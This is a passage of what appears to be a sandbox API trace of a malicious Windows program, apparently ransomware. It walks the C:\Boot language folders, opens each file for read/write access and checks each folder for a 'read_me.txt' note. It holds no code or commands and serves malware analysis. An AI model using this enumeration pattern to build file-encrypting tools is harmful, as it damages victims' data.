ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.853] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0073.853] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.854] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c7370, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.854] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\read_me.txt") returned 29 [0073.854] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\read_me.txt" (normalized: "c:\\boot\\it-it\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.854] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.854] CloseHandle (hObject=0x7ac) returned 1 [0073.854] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c7370, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.854] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.854] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\read_me.txt") returned 29 [0073.854] GetProcessHeap () returned 0x280000 [0073.854] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0073.854] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 12 [0073.854] GetProcessHeap () returned 0x280000 [0073.854] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.854] GetProcessHeap () returned 0x280000 [0073.854] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0073.854] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0073.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.854] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0073.854] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.854] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0073.854] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.854] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0073.855] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.855] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c7370, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.855] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt") returned 29 [0073.855] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt" (normalized: "c:\\boot\\ja-jp\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.855] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.855] CloseHandle (hObject=0x7ac) returned 1 [0073.855] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c7370, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.855] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.855] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt") returned 29 [0073.855] GetProcessHeap () returned 0x280000 [0073.855] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0073.855] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 13 [0073.855] GetProcessHeap () returned 0x280000 [0073.855] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ac00c0 | out: hHeap=0x280000) returned 1 [0073.855] GetProcessHeap () returned 0x280000 [0073.855] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.855] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0073.855] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.855] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0073.855] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.855] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0073.856] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.856] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0073.856] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.856] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.856] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt") returned 29 [0073.856] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt" (normalized: "c:\\boot\\ko-kr\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.856] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.856] CloseHandle (hObject=0x7ac) returned 1 [0073.856] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.856] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.856] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt") returned 29 [0073.856] GetProcessHeap () returned 0x280000 [0073.856] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.856] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 14 [0073.856] GetProcessHeap () returned 0x280000 [0073.856] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ad00c8 | out: hHeap=0x280000) returned 1 [0073.856] GetProcessHeap () returned 0x280000 [0073.856] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.856] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0073.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.856] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0073.857] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.857] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0073.857] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.857] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0073.857] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.857] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.857] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt") returned 29 [0073.857] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt" (normalized: "c:\\boot\\nb-no\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.857] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.857] CloseHandle (hObject=0x7ac) returned 1 [0073.857] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.857] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.857] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt") returned 29 [0073.857] GetProcessHeap () returned 0x280000 [0073.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.857] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 15 [0073.857] GetProcessHeap () returned 0x280000 [0073.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ae00d0 | out: hHeap=0x280000) returned 1 [0073.862] GetProcessHeap () returned 0x280000 [0073.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.863] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0073.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.863] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0073.863] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.863] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0073.863] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.863] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0073.863] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.863] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.863] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt") returned 29 [0073.863] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt" (normalized: "c:\\boot\\nl-nl\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.863] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.863] CloseHandle (hObject=0x7ac) returned 1 [0073.863] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.864] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.864] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt") returned 29 [0073.864] GetProcessHeap () returned 0x280000 [0073.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.864] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 16 [0073.864] GetProcessHeap () returned 0x280000 [0073.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8af00d8 | out: hHeap=0x280000) returned 1 [0073.865] GetProcessHeap () returned 0x280000 [0073.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.865] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0073.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.865] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0073.865] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.865] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0073.865] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, 